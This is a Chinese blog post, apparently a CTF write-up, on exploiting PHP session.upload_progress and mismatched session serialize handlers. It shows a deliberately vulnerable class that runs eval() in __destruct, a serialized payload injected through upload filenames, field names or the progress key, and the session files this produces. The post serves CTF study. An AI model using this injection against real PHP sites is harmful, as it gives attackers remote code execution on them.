session与session.upload_progress再认识

最新推荐文章于 2022-09-07 15:56:19 发布
最新推荐文章于 2022-09-07 15:56:19 发布
阅读量1.0k 收藏 2
点赞数 1
分类专栏: CTF赛题复现 文章标签: 安全漏洞 信息安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46918279/article/details/120954276
版权

题目:海河工匠

<?php
//O:4:"Demo":1:{s:4:"test";s:10:"phpinfo();";}
ini_set('session.serialize_handler', 'php');
session_start();
highlight_file(__FILE__);
class Demo{
    public $test;
    function __destruct(){
        eval($this->test);
    }
}
?>

子目录泄露,访问phpinfo.php页面

发现php.ini中是php_serialize、但是index.php里面设置为了php、并且有session_start(自动反序列化),同时修改了progress.name,也开启了cleanup和enabled,所以可以通过session上传进度,上传session文件,内容为反序列化内容,同时条件竞争即可。

结合:

WEB82-session文件包含

WEB263-session反序列化

进一步了解session和session.upload_progress知识

一、

cleanup 只会清除session文件内容,不会清楚session文件

二、

当页面使用ini_set修改php.ini文件的内容时,phpinfo()里面的local value内容也会修改

我们在脚本使用了ini_set('session.serialize_handler', 'php'); 而php.ini中使用的php_serialize

所以phpinfo()显示为:

三、

关于session.auto_start并且脚本里面没有session_start()函数时,cookie里面不会有PHPSESSID。

四、

PHPSESSID:

参考链接:cookie 中的 PHPSESSID_树洞树洞-单纯记录-CSDN博客_phpsessid

如果PHP脚本中有:

session_start();

则说明使用了SESSION。 

SESSION是一种机制,可以在服务器端跨文件暂时保存数据或传递数据,常用于购物车等方面。SESSION只在用户关闭浏览器之前有效。

PHP是怎样识别不同的SESSION的呢?

每一次SESSION会话都有一个SESSION ID,用来识别不同的会话,保存在浏览器Cookie之中,也就是这个名为PHPSESSID的Cookie

当然,通过修改session.name的值,这个名称是可以更改的。

浏览器将Cookie(包括PHPSESSID)发送给服务器,PHP才知道应该使用哪一个SESSION传递给PHP程序。

当php.ini(Windows下PHP的配置文件)中的

session.auto_start = On

时,PHP会自动创建SESSION,改为:

session.auto_start = Off

PHP就不会自动创建SESSION了。

 但当session.auto_start=off的时候,若脚本中有这么一行代码:

session_start();

那么即使session.auto_start = Off,cookie里面也会自动创建一个PHPSEEID

 这个PHPSESSION 的值就是session文件名字的一部分

文件名为:sess_PHPSESSID的值

这里因为有sess_start(),所以会自动创建一个PHPSESSID,我把它的值修改为flag

那么对应的session文件为:

 五、

当脚本中没有session_start()同时seesion.auto_start()=Off的时候,cookie中是没有PHPSESSID这个东西的。

但是可以通过session.use_strict_mode=0;(默认关闭)

所以我们能自己创建一个session文件,但是要配合session上传进度使用才会有对应的session文件。

这样是没有xxx这个session文件的

这样才有okokxxx这个session文件,且内容不为空

五.1、

同时在对一个同时有session_start()代码和ini_set('session.serialize_handler', 'php或者php_serialize')代码的页面使用session上传进度的时候

对没有session__start()的页面没有影响

能成功反序列化则sessoin文件不为空

session文件内容为:

 a:1:{s:23:"upload_progress_payload";a:5:{s:10:"start_time";i:1635162635;s:14:"content_length";i:1668;s:15:"bytes_processed";i:1668;s:4:"done";b:1;s:5:"files";a:1:{i:0;a:7:{s:10:"field_name";s:4:"file";s:4:"name";s:45:"|O:4:"Demo":1:{s:4:"test";s:10:"phpinfo();";}

若是正常上传session进度,则存在session文件,但是内容为空

若待反序列化的字符串是错误的,则不存在session文件

六、

在session上传的时候,有时候会出现PHPSESSID有时候会没有,比如会这样:

有PHPSESSID

无PHPSESSID

原因:没有PHPSESSID是因为在使用session上传进度之前我们删除了目标页面对应的PHPSESSID,没有的话自己加上也是可以的

七、

上传目标页面:

<?php
//O:4:"Demo":1:{s:4:"test";s:10:"phpinfo();";}
ini_set('session.serialize_handler', 'php');
highlight_file(__FILE__);
?>

当php.ini配置为session.serialize_handler=php_serialize,而当前页面为session.serialize_handler=php

 使用session上传进度 

session文件内容:

a:1:{s:23:"upload_progress_payload";a:5:{s:10:"start_time";i:1635170318;s:14:"content_length";i:1668;s:15:"bytes_processed";i:1668;s:4:"done";b:1;s:5:"files";a:1:{i:0;a:7:{s:10:"field_name";s:4:"file";s:4:"name";s:45:"|O:4:"Demo":1:{s:4:"test";s:10:"phpinfo();";}";s:8:"tmp_name";s:26:"/private/var/tmp/phpOr9kMY";s:5:"error";i:0;s:4:"done";b:1;s:10:"start_time";i:1635170318;s:15:"bytes_processed";i:1312;}}}}

上传目标页面:

<?php
//O:4:"Demo":1:{s:4:"test";s:10:"phpinfo();";}
ini_set('session.serialize_handler', 'php_serialize');
highlight_file(__FILE__);
?>

当php.ini配置为session.serialize_handler=php,而当前页面为session.serialize_handler=php_serialize

 使用session上传进度

 session文件内容:

upload_progress_payload|a:5:{s:10:"start_time";i:1635170618;s:14:"content_length";i:1668;s:15:"bytes_processed";i:1668;s:4:"done";b:1;s:5:"files";a:1:{i:0;a:7:{s:10:"field_name";s:4:"file";s:4:"name";s:45:"|O:4:"Demo":1:{s:4:"test";s:10:"phpinfo();";}";s:8:"tmp_name";s:26:"/private/var/tmp/phpirELYU";s:5:"error";i:0;s:4:"done";b:1;s:10:"start_time";i:1635170618;s:15:"bytes_processed";i:1312;}}}

所以利用session上传进度设置session文件内容时,不管页面的ini_set('session.serialize_handler', 'php');设置为php还是php_serialize,都是按照php.ini里面的session.serialize_handler来设置的。

八、

session上传进度三个反序列化点:

目标页面:

<?php
//O:4:"Demo":1:{s:4:"test";s:10:"phpinfo();";}
ini_set('session.serialize_handler', 'php_serialize');
session_start();
highlight_file(__FILE__);
class Demo{
    public $test;
    function __destruct(){
        eval($this->test);
    }
}
?>

(1)修改filename,需要转义,在双引号前面加上\

session文件内容 

a:1:{s:19:"upload_progress_123";a:5:{s:10:"start_time";i:1635176574;s:14:"content_length";i:1664;s:15:"bytes_processed";i:1664;s:4:"done";b:1;s:5:"files";a:1:{i:0;a:7:{s:10:"field_name";s:4:"file";s:4:"name";s:45:"|O:4:"Demo":1:{s:4:"test";s:10:"phpinfo();";}

(2)修改name,需要转义,在双引号前面加上\

session文件内容:

a:1:{s:19:"upload_progress_123";a:5:{s:10:"start_time";i:1635176884;s:14:"content_length";i:1664;s:15:"bytes_processed";i:1664;s:4:"done";b:1;s:5:"files";a:1:{i:0;a:7:{s:10:"field_name";s:45:"|O:4:"Demo":1:{s:4:"test";s:10:"phpinfo();";}

(3)同进行session文件包含一样,修改PHP_SESSION_UPLOAD_PROGRESS的值

这里不需要转义

 session文件内容

a:1:{s:61:"upload_progress_|O:4:"Demo":1:{s:4:"test";s:10:"phpinfo();";}

_Monica_
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHP基于session.upload_progress 实现文件上传进度显示功能详解
01-02
本文实例讲述了PHP基于session.upload_progress 实现文件上传进度显示功能。分享给大家供大家参考,具体如下: ...当一个上传在处理中,同时POST一个与INI中设置的session.upload_progress.name同名变量时,上传进度可
session.upload_progress文件包含漏洞
leekos的博客,分享web安全相关知识~
06-02 556
之前学习了该漏洞,但是没有做笔记,导致容易遗忘。在此用一个题目来理解漏洞以下是session.upload_progress.enabled可以控制是否开启session.upload_progress功能session.upload_progress.cleanup可以控制是否在上传之后删除文件内容session.upload_progress.prefix可以设置上传文件内容中的前缀session.upload_progress.name的值即为session中的键值。
CTF.show 文件包含
m0_64444909的博客
08-25 1721
ctf文件包含
session.upload_progress进行文件包含和反序列化学习
snowlyzz的博客
09-07 443
利用session.upload_progress进行文件包含
基于session.upload_progress 的文件上传进度显示
koastal的博客
10-31 5622
介绍session.upload_progress 是PHP5.4的新特征。 当 session.upload_progress.enabled INI 选项开启时,PHP 能够在每一个文件上传时监测上传进度。 这个信息对上传请求自身并没有什么帮助,但在文件上传时应用可以发送一个POST请求到终端(例如通过XHR)来检查这个状态。 当一个上传在处理中,同时POST一个与INI中设置的s
session.upload_progress反序列化学习
..
03-10 1811
Session的配置选项和存储方式 在php.ini中存在四项配置项: session.save_path="" --设置session的存储路径 session.save_handler="" --设定用户自定义存储函数,如果想使用PHP内置会话存储机制之外的可以使用本函数(数据库等方式) session.auto_start boolen --指定会话模块是否在请求开始时启动一个会话,默认为0不启动 session.serialize_handler string --定义用来...
PHP文件上传进度条插件js版 不需要修改php的session.upload-progress或安装额外的php模块等
最新发布
08-16
一,插件名 UploadiFive 二,apache或iis等服务器.需要修改文件上传大小时间等限制 三,文件默认上传到网站根目录的/Uploads/exe_file/目录中 四,默认不修改文件名,所以,上传的文件,不得有空格,中文斜线等非法字符
EurekaLog_7.5.0.0_Enterprise
11-15
9)....Added: EMemLeaks._ReserveOutOfMemory to control reserve size of out of memory errors (default is 50 Mb) 10)..Added: "MinLeaksLimitObjs" option (EMemLeaks unit) 11)..Added: Fatal memory problem ...
PHP使用Session实现上传进度功能详解
12-20
session.upload_progress.enabled INI 选项开启时,PHP 能够在每一个文件上传时监测上传进度。 这个信息对上传请求自身并没有什么帮助,但在文件上传时应用可以发送一个POST请求到终端(例如通过XHR)来检查这个...
文件包含骚姿势——利用session.upload_progress进行文件包含
weixin_46330722的博客
12-25 1929
利用session.upload_progress进行文件包含
利用session.upload_progress进行文件包含
qq_44657899的博客
10-26 3999
前言 又一种新的文件包含利用方法,记录一下复现过程。 学习自:LFI 绕过 Session 包含限制 Getshell 利用session.upload_progress进行文件包含和反序列化渗透 文章目录前言kali本地测试利用burp利用python脚本 kali本地测试 所有配置都为默认配置 大概原理:利用session.upload_progress上传一个临时文件,该文件里面有我们上传的恶意代码,然后包含它,从而执行里面的代码。因为该文件内容清空很快,所以需要不停的上传和包含,在清空之前包含该
php通过session实现upload_progress
prape's world!
01-07 1144
在php中,显示上传文件进度有swf,apc,纯javascript等集中方法,而现在比较推荐的是利用php的session(PHP>5.4)实现,这里,我简单的记录一下。 相关资料可以参考php.net/manual/en/session.upload-progress.php,还是相对比较简单的,可以参考www.111cn.net/phper/php-cy/54314.htm这里的讲解,但是
解决uploadify上传丢失session问题
竹音林的专栏
11-07 2888
今天在用jQuery的上传插件uploadify上传文件到后台处理数据的时候,发现session信息和当前会话session不一致,整理了一下如下:         由于uploadify属于flash上传,意味着当上传的时候会新建一个新的session会话,php后台处理的时候会接收不到当前浏览器的session会话参数而被服务器拒绝。 session是存放在服务器里面,但是一旦程序中加入这
ctfshow-文件包含&文件上传(详解)
qq_50589021的博客
07-20 3719
文件包含 web78-79 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } ?> 伪协议: ?file=php://filter/read=convert.base64-encode/resource=flag.php ?file=data://text/plain;base64,PD9waHAgc3lzd
CTF 中的 PHP 漏洞利用总结
热门推荐
重新启程
10-12 2万+
基础知识 系统变量(超全局变量) 在全部作用域中始终可用的内置变量 1 2 3 4 5 6 7 8 9 $GLOBALS // 引用全局作用域中可用的全部变量 $_POST // 获取 post 数据,是一个字典 $_GET // 获取 get 数据,是一个字典 $_COOKIE // 获取 cookie $_SESSION // 获取 session $...
PHP中的Session Upload Progress 设置问题
超人学飞的日子
07-06 1900
在写CTF题目的时候遇到了session反序列化的漏洞,需要通过Session Upload Progress来写入seession的值。在本地测试时遇到了些问题:fool1.php:&lt;?phpini_set('session.serialize_handler', 'php_serialize');session_start();//$_SESSION['ryat'] = $_GET['r...
对于session.upload_progress漏洞的理解
Huamang的博客
03-06 980
先放两个文章: https://www.freebuf.com/vuls/202819.html https://www.cnblogs.com/NPFS/p/13795170.html 利用session.upload_progress进行文件包含: 信息介绍: session.use_strict_mode默认值为0,此时用户是可以自己定义Session ID的。 比如,我们在Cookie里设置PHPSESSID=flag,PHP将会在服务器上创建一个文件:/tmp/sess_flag(还有可能在 /v
jarvisoj-web的一道SESSION反序列化题目
Firebasky的博客
08-14 473
哈哈哈,现学现卖。刚刚总结了session序列化漏洞。现在就来做一下这个题目 还是参考师傅博客。 题目地址 <?php //A webshell is wait for you ini_set('session.serialize_handler', 'php'); session_start(); class OowoO { public $mdzz; function __construct() { $this->mdzz = 'phpinfo().
app.session_interface.open_session 怎么使用
05-31
需要注意的是,`app.session_interface.open_session`方法并不是单独使用的方法,它通常用于与Flask中的会话管理器一起使用。在上面的示例中,我们使用了Flask默认的会话管理器,即`app.secret_key`。如果您使用了...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值